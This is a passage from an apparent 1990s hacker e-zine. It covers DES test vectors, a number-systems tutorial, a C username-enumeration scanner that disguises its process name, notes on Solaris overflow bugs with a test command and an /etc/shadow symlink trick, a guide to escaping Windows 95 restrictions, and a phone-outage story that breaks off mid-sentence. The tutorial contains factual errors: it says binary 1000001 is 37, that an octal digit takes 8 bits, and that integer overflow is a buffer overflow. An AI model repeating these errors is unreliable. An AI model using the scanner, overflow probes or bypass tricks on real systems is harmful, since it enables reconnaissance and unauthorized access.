E0FEE0FEF1FEF1FE 0123456789ABCDEF C39E072D9FAC631D
0000000000000000 FFFFFFFFFFFFFFFF 014933E0CDAFF6E4
FFFFFFFFFFFFFFFF 0000000000000000 F21E9A77B71C49BC
0123456789ABCDEF 0000000000000000 245946885754369A
FEDCBA9876543210 FFFFFFFFFFFFFFFF 6B5C5A9C5D9E0A5A

set_key test data
data[8]= FEDCBA9876543210
c=F9AD597C49DB005E k[ 1]=F0
c=E91D21C1D961A6D6 k[ 2]=F0E1
c=E9C2B70A1BC65CF3 k[ 3]=F0E1D2
c=BE1E639408640F05 k[ 4]=F0E1D2C3
c=B39E44481BDB1E6E k[ 5]=F0E1D2C3B4
c=9457AA83B1928C0D k[ 6]=F0E1D2C3B4A5
c=8BB77032F960629D k[ 7]=F0E1D2C3B4A596
c=E87A244E2CC85E82 k[ 8]=F0E1D2C3B4A59687
c=15750E7A4F4EC577 k[ 9]=F0E1D2C3B4A5968778
c=122BA70B3AB64AE0 k[10]=F0E1D2C3B4A596877869
c=3A833C9AFFC537F6 k[11]=F0E1D2C3B4A5968778695A
c=9409DA87A90F6BF2 k[12]=F0E1D2C3B4A5968778695A4B
c=884F80625060B8B4 k[13]=F0E1D2C3B4A5968778695A4B3C
c=1F85031C19E11968 k[14]=F0E1D2C3B4A5968778695A4B3C2D
c=79D9373A714CA34F k[15]=F0E1D2C3B4A5968778695A4B3C2D1E
c=93142887EE3BE15C k[16]=F0E1D2C3B4A5968778695A4B3C2D1E0F
c=03429E838CE2D14B k[17]=F0E1D2C3B4A5968778695A4B3C2D1E0F00
c=A4299E27469FF67B k[18]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011
c=AFD5AED1C1BC96A8 k[19]=F0E1D2C3B4A5968778695A4B3C2D1E0F001122
c=10851C0E3858DA9F k[20]=F0E1D2C3B4A5968778695A4B3C2D1E0F00112233
c=E6F51ED79B9DB21F k[21]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011223344
c=64A6E14AFD36B46F k[22]=F0E1D2C3B4A5968778695A4B3C2D1E0F001122334455
c=80C7D7D45A5479AD k[23]=F0E1D2C3B4A5968778695A4B3C2D1E0F00112233445566
c=05044B62FA52D080 k[24]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011223344556677

chaining mode test data
key[16] = 0123456789ABCDEFF0E1D2C3B4A59687
iv[8] = FEDCBA9876543210
data[29] = "
7654321 Now is the time for " (includes trailing '\0')
data[29] = 37363534333231204E6F77206973207468652074696D6520666F722000
cbc cipher text
cipher[32]= 6B77B4D63006DEE605B156E27403979358DEB9E7154616D959F1652BD5FF92CCE7
cfb64 cipher text cipher[29]=
E73214A2822139CAF26ECF6D2EB9E76E3DA3DE04D1517200519D57A6C3 ofb64 cipher text
cipher[29]= E73214A2822139CA62B343CC5B65587310DD908D0C241B2263C2CF80DA

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Learning to Count All Over Again
by Bronc Buster
(ww.showdown.org)
(bbuster@succeed.net)

When I read 2600 I see a lot of the other readers are young people, and
a lot of them are clueless about what makes this world go around. Well
for anyone who's been to my site or talked to me, they know that I like
to break down things into layman's terms. So anyone that might read
what I write, will come away with an understanding of the subject
rather then learning a ton of new acronyms and their eyes glazing
over as they pass out. Well this article is going to focus on numbers
and how to count with them among other things. I know what you're
thinking, but read on, as I'm not talking about 1 + 1 = 2. I'm
talking complex number systems using different bases of numbers
and sometimes using letters instead of numbers. I'm talking about
getting down to the computer level and why this is so important.

Computers talk with numbers. Zeros, 0, and Ones, 1. Over time we
have figured out ways to get them to understand Base 8, or Octal
numbers, and Base 16 numbers, Hexadecimal, or HEX as it's more
well known as, but they are still based on the 0 and the 1. Well
let's start with the basics and move on from there. How do we
count in Binary, with 0 and 1? Heck with only 2 numbers how are
you going to make a number like 27? In Assembly classes they
teach a column method to learn how to count and I like it, so
I'll use it to.

So here we go, I'll briefly go over the 3 different number systems,
show you how to read them with a chart and what their bases are
along with the number and symbols they use to function. Then I'll
show you how they sign numbers to show positive and negative numbers,
along with basic adding and subtracting. Then to wrap it up I'll tell
you why it's very important for anyone in the hacking scene to
understand these very basic operations and what usage it has
(can you say Buffer Overflow?).

Counting Binary
------------------

Binary is the basic low level 0 and 1, the only two things a computer
can really understand. It's like and on and off switch, that's all it
can do. So they came up with patterns of 0 and 1 that stood for other
numbers so we could count and perform other operations all based on
the power system for the number 2. Read 2^3 is 2 raised to the 3rd
power, or 8, the top row of numbers.

16 8 4 2 1

2^4 | 2^3 | 2^2 | 2^1 | 2^0
---------------------------------------- binary = base 10
0 = 0 0 = 0
1 = 1 1 = 1
1 0 = 2 10 = 2
1 1 = 3 1 1 = 3
1 0 0 = 4 1 0 0 = 4
1 0 1 = 5 1 0 1 = 5
1 1 0 = 6 1 1 0 = 6
1 1 1 = 7 1 1 1 = 7
1 0 0 0 = 8 1 0 0 0 = 8
1 0 0 1 = 9 1 0 0 1 = 9
1 0 1 0 = 10 1 0 1 0 = 10


As you see, it's simple enough after you get the patterns down,
and if you notice, it's repeating. After going through the cycle,
you add another 1 to the end and repeat the cycle for the new ending
1. It may take some time getting used to reading it, but after a few
minutes you can pick it up pretty easily. Well this is all fine and
dandy, now you can read binary, so lets move on to base 8, or octal.

Counting Octal
------------------

Well since binary is base 2, and octal is base 8 we need a new set of
numbers. Remember binary has 2 numbers, 0 and 1, octal therefore must
have 8; 0,1,2,3,4,5,6,7. Much like binary we can make a column chart
to read these numbers.

4096 512 64 8 1

8^4 | 8^3 | 8^2 | 8^1 | 8^0
-------------------------------------------
0 = 0
1 = 1
2 = 2
3 = 3
4 = 4
5 = 5
6 = 6
7 = 7
1 0 = 8
1 1 = 9
1 2 = 10
1 1 6 = 78

Notice that the octal number are cubes of the binary numbers, sense
2^3 is 8. i.e. 64 = 8^2 or (2^3)^2. This come in handy when you can't
remember a conversion or the number is really weird. As you may of
guessed, or may not have, octal numbers use up 8 bits per number, because
they are ultimately stored as zeros and ones. The number 7 in octal is
just 7, but to store it it takes 8 bits, or 00000111.

Counting Hexadecimal
-----------------------

Hexadecimal, or HEX as it's better known, is base 16. Now as you gather
from octal numbers, when you change bases you need a new set of numbers
to count with. Base 16 has 16 numbers, like octal has 8 and binary has
2. They are:0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F. Why A-F instead of maybe
something else? Well the letters A-F are well known and are in order,
so for simplicity the makers of HEX used them. Like octal and binary we
can use a column chart to count in HEX.


4096 256 16 1

16^3 | 16^2 | 16^1 | 16^0
-------------------------------------------
0 = 0
1 = 1
2 = 2
3 = 3
4 = 4
5 = 5
6 = 6
7 = 7
8 = 8
9 = 9
A = 10
B = 11
C = 12
D = 13
E = 14
F = 15
1 0 = 16
1 1 = 17
1 E = 30
8 5 = 133

As you can see, HEX is a little more complicated and takes practice to
get used to. Even when you can effectively understand the numbers,
sometimes you still need a calculator or a program, like a HEX editor
to read them because of their sizes and complexities.

Quick Lesson on Conversions
------------------------------

I know that a natural question has to be if there is an easier way
to convert between the bases, and luckily there is. I'll give a quick
lesson, as it's pretty simple. binary numbers can be 1 bit, and octal
numbers can be made up from 3 bits on binary. HEX, likewise, can be made
from 4 bits of binary. It's easier to show:

Lets say we have a number, 62, In binary it's: 0 1 1 1 1 1 0, and
to convert to octal, we group it into 3 bit segments, from the right,
and read it: 0 (1 1 1) (1 1 0). We can ignore the leading 0. So
in octal we read it in binary, 1 1 1 = 7, and 1 1 0 = 6, so in octal
it's 76.

Let's use 62 again and find HEX. This time we group in 4s, from the
right, like so: (0 1 1) (1 1 1 0), since the first term has only 3
terms we can add a leading 0, but it will not make any difference to
the outcome. Read the groups, 0 1 1 = 3, and 1 1 1 0 = E, so in HEX
it's 3E.

0 1 1 1 1 1 0 - Binary
0 ( 1 1 1 ) ( 1 1 0 ) - Octal
( 0 1 1 ) ( 1 1 1 0 ) - Hex

If you're clever you can figure out how to convert from any of the 3
to any of the others with minimal effort.


Signed Numbers
------------------

How do computers know if a number is positive or negative if all it
sees is zeros and ones? Well for the purpose of this article I'll keep
it simple and use binary, as octal and HEX can get very complex. Before
we go any further I have to explain what complementary systems are as
we are going to be using base complements to determine signs.

A base complement is when you take the largest number in a numbering
system and subtract from it. For example, say we are in normal everyday
base 10, and we have the number 1267. If we want to find it's complement
we would take the largest number in base 10s number system, a 9, and
subtract each number from it.

9999
- 1267
----------
8732

So 8732 is the complement to 1267. Lets try binary. Since binary is
base 2, then the largest number is 1. Say we have the number, 62 again,
in binary, 0 1 1 1 1 1 0, let find it's compliment.

1111111
- 0111110
---------------
1000001 = 37

So we see that 37, or 1 0 0 0 0 0 1, is the complement to 62,
or 0 1 1 1 1 1 0. Using complements we can sign a number as negative
or positive.

How? Well all positive numbers will be in true form, like 62 will
be 0 1 1 1 1 1 0, but if we had a negative 62, we would use it's
complement, or 1 0 0 0 0 0 1. "
Hold on" you say, "1 0 0 0 0 1 is 37!".
Not anymore, as binary numbers use a signed bit, or the first bit to
determine if a number is positive or negative. The first bit is used
to tell this, if it's a 1 it's signed negative, if it's a 0 it's signed
positive. So how do we get 37? Add a leading 0, 0 1 0 0 0 0 0 1; now
that's 37 and 1 0 0 0 0 0 1 is a negative 62. Once the computer sees
the leading bit is a 1, it knows it's dealing with a negative number.
An easy way to remember how it works, if the first bit is a 1, that
find out what is the column value for that bit, so in 62 the first bit
would be a 64, or 2^6. Since the binary number 0 1 0 0 0 0 0 0 is 64,
and 0 1 1 1 1 1 1 1 is 63, then if we us 1 0 0 0 0 0 1 as negative 62
we can think of the first slot as a negative number, or the first bit
as the negative and everything else positive. Say the first bit is
a negative 64 instead of a positive 64, then subtract 1 because we
are in reverse, then subtract for each other 1, the number of that
column, so in this example, we would subtract 1 more for the 1 in
the first column giving us negative 62.

It can get complicated, but it just takes a little practice. Why practice?
Why care about all this crap? Beside the fact it will help you later on
down the road for those of you planning on going to college to continue
your schooling in computers, it's very helpful in hacking to know this to.

The Buffer Overflow
------------------------

I'm going to make a very simple example of what a buffer overflow is
and how it happens and what it has to do with all these numbers and
number systems. Well for this articles purpose let use a very
simplistic 4 bit number in binary. As some of you know modern buffer
overflow attacks are in HEX, or as the exploit code calls it, Assembly,
which is actually wrong. Ok, say we have a number, and we want to do
some addition, the numbers 3 and 6 using 4 bits.

0 1 1 0 = 6
+ 0 0 1 1 = 3
------------
1 0 0 1 = - 7

Hold on, 3 + 6 = -7? In 4 bits the computer thinks that this number
is 9, but 4 bits can't hold the number 9, and it comes up with negative
7. Whammo! Buffer Overflow.

Most computers from the 8086 and up have a flag that indicates if a
buffer overflow has occured or not, but if the code has not been
carefully designed, skillful coders can find and exploit codes that
are vurnerable, and they do every day. Filling up buffers with numbers
in HEX that a larger then a buffer was designed to handle, crashing
programs, racing for root.

Conclusions
----------------

I hope I've made clear how to understand binary, octal and HEX number
systems; how to read them, how to manipulate them back and forth, and
how they

  
sign numbers so one may perform basic mathematical operations.
I also hope, if you learned anything, is how important it is to
understand these number systems and how they tie into hacking and
your future down the road.

I am a firm believer that if you learn the basics then the hard stuff
will be easy....

Bronc Buster!!!

Thanks to RLoxley, NeTJaMMr and Perhillion for helping proof this.

[EOF]

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Mail server username scanner - scan.c
by memor

/* Make a usernames lists from a file, to an host, via Fingers..
for any use..
example:
scan userfile mail.server.to.scan.net

or to save it in an outpout file :
scan userfile mail.server.to.scan.net > result

have fun with that little thing...

memor/hbs - sjta
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void main(int argc,char *argv[])
{

/* define file handle , strings */

FILE *nombre1;

char *nom;
char *commande;
char *dnsip;

int fin;
int test;

/* create stacks */

nom = (char *)malloc(30);
commande = (char *)malloc(30);
dnsip = (char *)malloc(50);

fin=0;

/* do we have enough arguments ? no ? */

if (argc<3)
{
printf("Scans for usernames with finger.. memor(hbs/sjta) \nusage : %s userfile host\n",argv[0]);

/* ok bye.. not enough arguments */

exit(1);
}

/* we have enough.. we can now work :) */

if (argc>2)
{
nombre1=fopen(argv[1],"r");

/* can we open that file ? /*

if(nombre1==NULL)
{
printf("Can't open the file!!\n");

/* no? ok bye.. :) */


exit(1);
}


/* saving some arguments and hiding the programm */

sprintf(dnsip,"%s",argv[2]);
sprintf(argv[0],"joe ");
sprintf(argv[1]," ");
sprintf(argv[2]," ");

/* while we reach the end of file :) */

while(fin!=1)
{

/* i catch the username and wait test for the end of file */

test=fscanf(nombre1,"%s",&nom[0]);

if(test==EOF) fin=1;
else {

/* i attempt a finger to see if we got an existant username */

sprintf(commande,"finger %s@%s",nom,dnsip);
printf("Scanning for [%s] ..\n%s\n",nom,commande);
system(commande);
}
}

/* closing input file of usernames */

fclose(nombre1);
}
}

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Vuls in Solaris 2.5.1
by Shok

Although there are vulnerabilities known in rlogin and chkey, these are
unrelated to them.

rlogin:
They have the following code (which is pathetic might I add):

char *p;
char term[256];
[...]
p=getenv("TERM");
[...]
strcpy(term, p);

Yah there is Sun's super security.......... sheesh the obvious fix would
be a simple strncpy but NO they had to do it the secureless way ;)

arp:
Well this is the gethostbyname() vulnerability in solaris 2.5.0 and 2.5.1
Now as most people know, there was a vulnerability in gethostbyname, and
it's sploit used rlogin. Well.....if they chmod -s'd rlogin (which would
break it anyway), you could still use arp, as it is suid (although
occasionally I set it sgid instead). This is a shortened version of the
code:

if (argc == 2) {
get(argv[1]);
exit(0);
}

get(host)
char *host
{
[...]
hp = gethostbyname(host);

More great ol' Sun security eh? The sploit code for this is just a
modified gethostbyname sploit.

chkey:
gee let's look at this one.......
char program_name[256];
strcpy(program_name, argv[0]);

WAHOO!!! THE BEST ONE YET!
Once again great job sun......

Although I should make it clear I do like Sun.....but they are really
ignorant assuming people won't get ahold of the source so they don't have
to use proper bounds checking....I mean that should be like common sense.

That's all I am going to mention.....although I will give a few....
I'm looking at cu and uucp which appear to have an overflow in there
remote host and commands.......to test this you ought to just make a
generic program:

#include <stdio.h>

void main(int argc, char **arg)
{
unsigned long int i;
unsigned long int num;
num=atoi(argv[1]);
for (;i<num;i++)
{
putchar('X');
}
}

Compile that as we'll say testit then do on solaris 2.5.1....
uucp `./testit 9999`!`./testit 9999` `./testit 9999`!`./testit 9999` or
whatever the format is......and do the same thing to cu.....I haven't
tried this yet...this is just based on the source.......and like I said
it's possible..the code jumps across many functions and I don't have time
to follow it.......so lemme know the results (shok@sekurity.org, I'm not
going to give my domain at this time... ;))

There was a CERT advisory on rdist vulnerability for Sun, however they
gave enough information to easily find out what the vul was.
Here is the vul:
I'm not going to put all the code for this because it crosses several
functions.....but you pass a macro to argv[1] and it first calls a
makenl() which I guess has something to do with checking if it's a macro
or something but there is no man page for it and it's not in the source so
I don't know what it is.....but then argv[1] is passed on to expand with
this:
in expand expstr(which is the vul function) is called as
expstr(nl->nl_name); and nl->nl_name is argv[1] if it is a macro I'm
assuming. But this is expstr():
expstr(s)
char *s;
char buf[BUFSIZ];
[...]
sprintf(buf, "%s%s%s", s, tp->n_name, tail);

As described in expand.c.......it appears that you can manipulate
enviromental variables like SHELL, TERM, etc.....and ~user is also a
macro..you get the idea
shchars = "${[*?".....
E_VARS for expanding variables.......
E_SHELL...
E_TILDE......so if you did rdist $SOMEVAR it will recognize the '$' and
expand that variable.......I haven't been able to test this as the BUFSIZ
is too big and I get disconnected if I export a variable greater than 1000
or so (weird heh...)


This is also related to the message I posted to bugtraq on multiple
overflows in MH-6.8.3.

In ruserpass.c, in the function rnetrc().....they have the following
(which has two vuls):
char *hdir, buf[BUFSIZ];
hdir=getenv("HOME");
[...]
sprintf(buf, "%s/.netrc", hdir);

Now there are two problems with this.....
First of all the obvious....is there is an overflow. Secondly, all one
would have to do is for example ln -s /etc/shadow $HOME/.netrc and you
could abuse that. Libc specifically says you shouldn't do this.

In libcurses, in pr_headers, in print.c there is an overflow in the
char *terminfo;
char buf[512];

terminfo=getenv("TERMINFO")
[...]
sprintf(buf, "%s%s%s", terminfo.....

So anything that uses libcurses (such as screen), is vulnerable. Anyway
it's late, I'm tired.

So that's about all for now.

Enjoy,
--==+*~(Shok)~*+==--

shok@sekurity.org
HOME PAGE: http://www.janova.org FTP SITE: ftp://ftp.janova.org


ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Operating Systems
by Fucking Hostile

There are a lot of Operating Systems out there. It seems that the two
major ones are Windows and Linux. Among the average computer user you will
find that most of them use Windows 95 or NT. In the computer underground now
it seems the trend is Linux and its varients. Anyways this article will not
be about either of those, actually it will have some info on them but that's
not all. I am writing this with intention to give readers the knowledge of
all available OS's there are out there. Information on the OS, where to find
out more about it, and where to get it. Hopefully people will learn about all
the options they have beyond the trend that is going on out there. This gives
only a little detail on the OS but at least gives you some ideas to look at.


- AROS -

About: The Amiga Replacement OS. Idea started around 1993 when Amiga was at
a low point. AROS fully started in the winter of 1995. The goal of AROS is
to be as compatible as possible to AmigaOS 3.1, ported to different types of
CPU's, Binary compatible on Amiga and source compatible on other hardware,
and can run as a standalone version which boots directly from harddisk, as
an emulation which opens a window on an existing OS to develop software and
run Amiga and native applications at the same time and as a link library
which allows to create native applications with the comfort of the AmigaOS.

Current Version: Unknown

Homepage: http://aros.fh-konstanz.de/aros/

- BeOS -

About: In 1990 former former president of Apple's product division,
Jean-Louis Gassée, formed Be. INC. The Be Operating System is a new software
system designed for the media and communications-based applications of the
next decade. While retaining compatibility with data and network standards in
use today, the BeOS jettisons many of the assumptions inherent in older OS
architectures to achieve a new level of performance and a significantly
simplified programming model. The BeOS features: A True Multitasking, Heavily
Multi-threaded System, Symmetric Multiprocessing, An Object-Oriented Design,
A Design for Real-Time Media and Communications, and Simplicity.

Current Version: Unknown

Homepage: http://www.be.com

- CHORUS/OS -

About: The CHORUS/OS family of operating system products has been designed
for telecommunications and other real-time embedded systems manufacturers.
CHORUS/OS offers a binary family of highly configurable, richly featured,
componentized operating system products. When CHORUS operating systems are
integrated with CHORUS/COOL ORB, Chorus' distributed real-time embedded
object request broker, real-time systems and devices have access and are
accessible to any computer, or server in the enterprise, providing management
systems in the enterprise with access to data from the embedded world, and
giving the embedded world access to application software available from
management systems.

Current Version: Unknown

Homepage: http://www.chorus.com

- FreeBSD -

About: FreeBSD is an advanced BSD UNIX operating system for "PC-compatible"
computers, developed and maintained by a large team of individuals. FreeBSD
offers many features today which are still missing in other operating
systems, even some of the best commercial ones. Advanced features for
performance, security, and even binary compatibility with other popular
operating systems. And it's free.

Current Version: 2.2.2

Homepage: http://www.freebsd.org

- NetBSD -

About: The NetBSD Project is the collective volunteer effort of a large group
of people, to produce a freely available and redistributable UNIX-like
operating system, NetBSD. NetBSD is based on a variety of free software,
including 4.4BSD Lite from the University of California, Berkeley. It runs on
a large number of hardware platforms and is highly portable. It comes with
complete source code, and is user-supported.

Current Version: 1.2

Homepage: http://www.netbsd.org

- OpenBSD -

About: The OpenBSD project was spawned from NetBSD (ie. a member of the
4.4BSD family) and is developed separately. OpenBSD tracks bug reports and
source tree changes from the NetBSD and FreeBSD projects fairly closely. Even
pieces of code from the Linux projects have been used. OpenBSD has too much
shit about it to even list so just check out the homepage.

Current Version: 2.1

Homepage: http://www.openbsd.org

- GEOS -

About: Geoworks designed the GEOS® operating system to enable devices that
are graphical, easy-to-use, affordable, feature-rich, and able to support
advanced communications. Geoworks believes there are several primary
characteristics necessary for system software in these new devices. The
operating system must be flexible so that device manufacturers can customize
their products for specific markets. The software must deliver high
performance without sacrificing efficiency. And users of these devices must
be able to connect to standard data sources, including the desktop, corporate
network, and Internet services.

Current Version: Uknown

Homepage: http://www.geoworks.com/htmpages/sso.htm

- Inferno -

About: Inferno was developed by the scientists at Bell Labs, Lucent
Technologies' research and development arm. The Computer Science Research
Center of Bell Labs created Inferno - this same Center developed UNIX, C and
C++ programming languages and workstation technologies. Inferno is a Network
Operating System that delivers interactive services through a variety of
networks, providing ubiquitous access to resources and information.

Current Version: 1.1

Homepage: http://207.121.184.224/info.html

- TurboLinux -

About: TurboLinux 1.0, a new Linux distribution fully compatible with RedHat
Linux, some features include Easy Installation and Setup - Hardware
components (SCSI, Ethernet, and Video adapters) are automatically detected at
installation. TurboDesk - This configurable desktop environment allows
customization without editing text files. AutoUpdate - Packages are
seamlessly installed onto your system using either the interactive mode or
the fully automatic mode.

Current Version: 1.0

Homepage: http://www.turbolinux.com

- Other Linux OS's -

TurboLinux is one of the newer ones so that is why I mentioned it.. there are
a lot more tho that can be found at: http://www.linux.org/dist/index.html

- Microsoft Windows -

Windows 3.1 - Windows 95, Windows 97, Windows CE, and Windows NT

You all know about Windows. If not go to: http://www.microsoft.com

- MINIX -

About: MINIX is a free UNIX clone that is available with all the source code.
Due to its small size, microkernel-based design, and ample documentation, it
is well suited to people who want to run a UNIX-like system on their personal
computer and learn about how such systems work inside. It is quite feasible
for a person unfamiliar with operating system internals to understand nearly
the entire system with a few months of use and study.

Current Version: 2.0

Homepage: http://www.cs.vu.nl/~ast/minix.html

- OS/2 -

About: IBM's OS. Kind of like Windows except they have less software made for
them. If it wasn't for that it might not be too bad.

Current Version: Unknown

Homepage: http://www.software.ibm.com/os/warp/

- Plan9 -

About: Plan 9 is a distributed computing environment assembled from separate
machines acting as terminals, CPU servers, and file servers. A user works at
a terminal, running a window system on a bitmapped display. Some windows are
connected to CPU servers; the intent is that heavy computing should be done
in those windows but it is also possible to compute on the terminal. A
separate file server provides file storage for terminals and CPU servers
alike.

Current Version: Unknown

Homepage: http://www.ecf.toronto.edu/plan9/

- Xinu -

About: Xinu is a small, elegant, multitasking Operating System supporting the
following features: Concurrent Processing, Message Passing, Ports,
Semaphores, Memory Management, Buffer Pools, Uniform Device I/O, Shell, Tcl,
and TCP/IP.

Current Version: Xinu 7.9

Homepage: http://willow.canberra.edu.au/~chrisc/xinu.html

- QNX -

About: Started off being called 'Quick Unix', the QNX realtime OS offers you
all the advantages of a true microkernel. It's small, scalable, extensible,
and fast. As a true microkernel OS, QNX starts with a lean core of highly
reliable code. It's small enough for ROMable embedded applications, yet
powerful enough to run a distributed network of several hundreds of
processors.

Current Version: Unknown

Homepage: http//www.qnx.com

- Solaris -

About: Sun Unix-based user environment, including the Unix operating system
and an X11-based window system. Solaris 1.x is a retroactive (marketing?)
name for SunOS4.1.x, a BSD-like version of Unix with some SVR4 features.
Solaris 2.x (which is what most people mean by "Solaris") includes SunOS5.x,
which is an SVR4-derived Unix.

Current Version: 2.6

Homepage: http://www.sun.com/solaris/index.html

------

Well that is all I have. There are a lot of others out there and a lot more
information on them then I have supplied but hopefully this will give some
people stuff to check out. Also check out http://www.myos.com and
http://www.ugu.com for more info on different OS's.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Hacking your way to DOS
by Devix

Well, I thought I should write an article for thtj this month so here
it is... Newbies Guide: Hacking your way to DOS. Unfortunatly your
access to DOS may be restricted so you can't play your games or hack
the LAN. This article will attempt to describe many various ways to
break out of that annoying GUI called windows95 and bring you back to
DOS.

There are many ways to protect you from getting to DOS such as using
policy editor (most common. this can be found on your windows95 cd) or
some other 3rd party software package. Some of these ways may not work
so if one doesn't, just try the next.

1. The old F8 on boot-up. This one is self explanatory. When you see
the "Starting Windows 95..." quickly press the F8 button and it may
bring up a menu that looks like this:

Microsoft Windows 95 Startup Menu
==================================

1. Normal
2. Logged (\BOOTLOG.TXT)
3. Safe mode
4. Safe mode with network support
5. Step-by-step confirmation
6. Command prompt only
7. Safe mode command prompt only
8. Previous version of MS-DOS

Enter a choice: 1

You should choose #6. If everything goes right, you will soon see a
"C:\". If the menu doesn't show up when you press F8, the
administrator (or computer teacher) may have disabled this. To re-
enable it, just fire up notepad and edit "c:\msdos.sys". This file is
normally a system/hidden/readonly file. The part you want to edit is
the line that says "BootMulti=0". Change it to "BootMulti=1".

2. Using OLE. Just start up any program thats supports object
embedding such as wordpad and choose "Object..." from the "Insert"
menu. A fancy little box should pop up. Click on "Create from File"
and put this as the file name: "c:\command.com". Click OK and you
should now see an icon stuck in your wordpad document. Double-Click
the icon and a dos prompt should appear.

3. Creating a shortcut in the desktop/start menu. Start any 32-bit
program that lets you open/save files. Click on "Open..." (or "Save
As..."
) from the "File" menu and change to the directory
"c:\windows\desktop" or "c:\windows\start menu". Right-click in the
main box and choose "New -> Shortcut" from the menu that pops up.
Create a shortcut to "c:\command.com" and then look on the
desktop/start menu for the icon. Use it.

4. Command.com from "File Find". Click once on a blank part of the
taskbar. Press F3. Search for "command.com" from drive "c:". To speed
this up, unselect "Include subfolders". Click "Find" and when
command.com shows up in the results area, double-click it.

5. Editing ".lnk" files. Just edit one of the
"c:\windows\desktop\*.lnk" files with a program that will let you edit
the actual lnk file, not the file it links to. most 16-bit editors
should work. Just change it like you would with a hex-editor so that
it links to "c:\command.com" instead.

6. Changing shells. Just edit "c:\windows\system.ini" so the line that
says "shell=Explorer.exe" will say "shell=c:\command.com". Restart the
computer and you will now have a dos prompt. From dos, type "explorer"
to get the rest of windows loaded. Change system.ini back when you
need everything to work how it was.

7. "Open with...". Start some 32-bit program. Choose "Open..." from
the "File" menu and right-click a file while pressing shift. Choose
"Open with..." and proceed to open the file with "c:\command.com".

8. Word 6+ Macros. Start up Microsoft Word and make a macro that says:

shell "c:\command.com"

Run it.

9. Visual Basic. Startup Vb, make a command button on the form, and
give it the code:

x = Shell("c:\command.com")

Press F5 and then click the button that you just made. Voila!

10. Resetting the screen. Shut down the system so that it shows that
stupid screen "It is now safe to shut off your computer." That screen
is really just a bmp file being displayed over a dos prompt. Type the
following just like you were in dos:

cls
mode co80

This will attempt to reset the screen and show you a "C:\" if it is
applied at the right time.

11. Netscape Apps. Choose "General Preferences" from the Options menu
in netscape and then click on the tab labeled "Apps". Type in:
c:\command.com for your telnet application and then click OK. Next,
surf on over to "telnet://". This should launch a dos prompt.

12. System Information. Start up Microsoft Word and goto "About" from
the help menu. Click the "System Information" button and then the "Run"
button.


Well thats about all I can think of. I know that there is many more
ways to get to dos but I am too busy to find them... Seeya!

Devix - devix@thepentagon.com
www.thepentagon.com/devix
PGP key available above. Use it.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
A phreak's dream come true
Written for thtj from the personal accounts of Kode9

Saturday, September 13, 1997: Kansas City, Missouri

The local Southwestern Bell telephone office gets its basement flooded.

Waking to the sound of a telephone ringing can be a pleasing experience, or
it can be an irritating one; it guess it depends on how much you like phones.
On this particular Saturday, I woke to that very sound, a ringing, but it was
like no ring I'd heard before. It was a bunch of truncated rings, back to
back, like ri..ri..ri.. instead or ring.....ring.....ring. I didn't know what
it was, I didn't pick up the phone either. Thinking it'd go away, I just
waited on it. But it kept making that short ring, over and over again. It
lasted for about ten minutes, and then as quickly as it'd started, it
stopped.

I picked up the phone; no dialtone. It was silent, but it wasn't dead... the
keypad lit up. There must be current, I thought. So the lines were alive, but
there was no dialtone. The switch must've died. Do switches die? This one
wasn't working. Was I the only one? I couldn't call anyone to find out, I'd
have to drive around and see what was going on.

The mall was alot more interesting than normal today, because apparently the
payphones weren't returning quarters. Don't people listen for a dialtone
before sticking in their money? I've never seen so many people so pissed at a
payphone in my life, it was almost like a riot. I checked for a dialtone on
one of them, though I was fairly certain there wouldn't be one, and I was
right. Dead silence.

How could this fast food eating, instant coffee drinking, all the day's news
in a half hour watching society survive without phone service? Cellular, of
course. The phone of the future, or at least, that's what the cellphone
companies want us to think.

Cell activity today was at an all time high, based on all the calls I picked
up on my scanner. Most of them were people saying "oh gosh, my phone is
dead!"
but I did catch DOW chemical ordering some nitroglycerin. Stronger
plastics through the use of explosive compounds? I guess it's possible. I'm
certain that even though 911 has a cellular system, alot of people died as a
result of the lack of landline service.

Over the course of several hours of waiting for my precious phoneline to
whisper a dialtone softly in my ear, I learned via the local news that the
phone outage was caused by a water main break that flooded the basement of a
SouthWestern Bell building, which just so happened to service the exchange I
was in, along with exchanges in half the city. The water had apparently
shorted out the ESS, and down came the system as a result. It's a wonder this
hasn't happened before, SWBell being genius enough to house their ESS in the
basement.

If you haven't wondered already, as to why this story is being called 'a
phreak's dream come true', you're not too bright. For those of you who are
wondering, the title is soon to be explained to you. The phone company, in
its infinite wisdom, decided that rather than continuing to leave the
majority of a large city deaf and mute, they would do the best they could to
